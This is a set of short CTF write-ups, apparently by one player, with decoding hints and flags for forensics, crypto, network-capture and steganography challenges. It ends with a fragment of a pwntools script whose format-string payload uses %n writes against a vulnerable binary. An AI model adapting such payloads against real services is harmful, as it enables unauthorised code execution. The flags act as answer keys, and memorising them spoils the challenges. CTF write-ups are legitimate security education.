parksjin01

Failure to boot

• Googling Error 0x00000023 you can find it occur in FAT format system
• flag FAT

Technician Challenge

• Googling first unlocked iphone traded we can find some young student hack iphone and get car for reward.
• flag Nissan 350Z

Read the manual

• Just do caesar decrypt

parksjin01

zer0-day

• You can get hint in last sentence(= is used as padding)
• split string by \n and do base64 decoding each sentence.
• flag: flag{We are fsociety, we are finally free, we are finally awake!}

ones and zer0s

• change binary to ascii.
• flag: flag{People always make the best exploits.}

precision

parksjin01

pcap.pcapng

• File is really big, there are 26365 packets in pcap file.
• There are telnet packet in here and there are flag
• FLAG: flag{bigdataisaproblemnotasolution}

Not-NYSEC

• Googling informal security meetup, we can find many meetups as result.
• Just enter all of them
• Answer: CitySec

parksjin01

forencis-150

• It was the hardest problem with png, I've ever solved.
• Change black if pixel's value is above the average of row pixel.
• Now web site is deleted so can't get proper web page and get flag
• Decoded image is in here

parksjin01

network1

• It's telnet packet and it's not encrypted so we can easily see packet
• Flag: flag{d316759c281bf925d600be698a4973d5}

network2

• It's pcap file but if you try to open it with wireshark you can't get enough information.
• If you search all strings with 'string' command you can see very wierd mark and it's flag.
• Flag: flag{f9b43c9e9c05be5e08ea163007af5144}

Black and White

parksjin01

exploitation1-release

• If we open elf file with gdb, we can find AAAAAAAAAAAAAAAAAAAAAAAAAA and we can guess correct pw is that
• Password(Not Flag): AAAAAAAAAAAAAAAAAAAAAAAAAA

telnet.pcap

• It's not encrypted so we can see packet easily.
• Computer user id is csaw and password is welcome to 1969

challenge2

• It has FSB in program.

parksjin01

Crypto1

• Number represent ascii code in decimal.
• Translate it to characters with program you wrote.
• Flag: Welcome to the 2011 NYU Poly CSAW CTF event. We have planned many challenges for you and we hope you have fun solving them all. The key for this challenge is cryptography.

Crypto2

• Number represent ascii code in hex.
• First split number with ':' and then translate it to characters with program you wrote.
• Flag: This is the first message being sent to you by the leadership of the Underground Uprising. If you have decoded this message correctly you will now know our next meeting will be held on Wednesday @ 7pm. We will also require a key to be let into the meetings; this week�s key will be overthrow.

parksjin01

every_body_is_winner

• It's bonus prob. Flag is in txt file
• Flag is igotapoint

Look at these colours

• If you open png file there are gray-black lines. It's very strange.
• If you check that lines rbg value and translate it to ascii you can get the flag is [115, 84, 101, 103, 97, 110, 48, 103, 114, 97, 112, 104, 121]
• Flag is sTegan0graphy

Harry-poter

parksjin01

Game starts here

• It was just kind of bonus prob.
• Flag: pragyanctf{HelloWorld}

Look harder

• You can get png file at here
• I think it's in wrong category, it's more similar with steganography
• If you open png file, you can see QR-code. However QR-code is not clear and Smart phone application can't read it.
• So if you change yellow color to black you can get flag

parksjin01

You can get bin file at here

I think it's funny program. Someone predict 2012 was last year of earth but that was wrong.
This programs function is related with it and I thought it was funny idea.
Anyway, this program has FSB in fnprintf. So you can easily crack it. I used python script to do that.

from pwn import *
import time
# dup2(4) as our socket is fd 4
shellcode = '\x0c\xd5\xff\xff'*2+'\x0e\xd5\xff\xff'*2+'%10x'*3+'%45375c'+'%n'+'%22167c'+'%n'+'\n'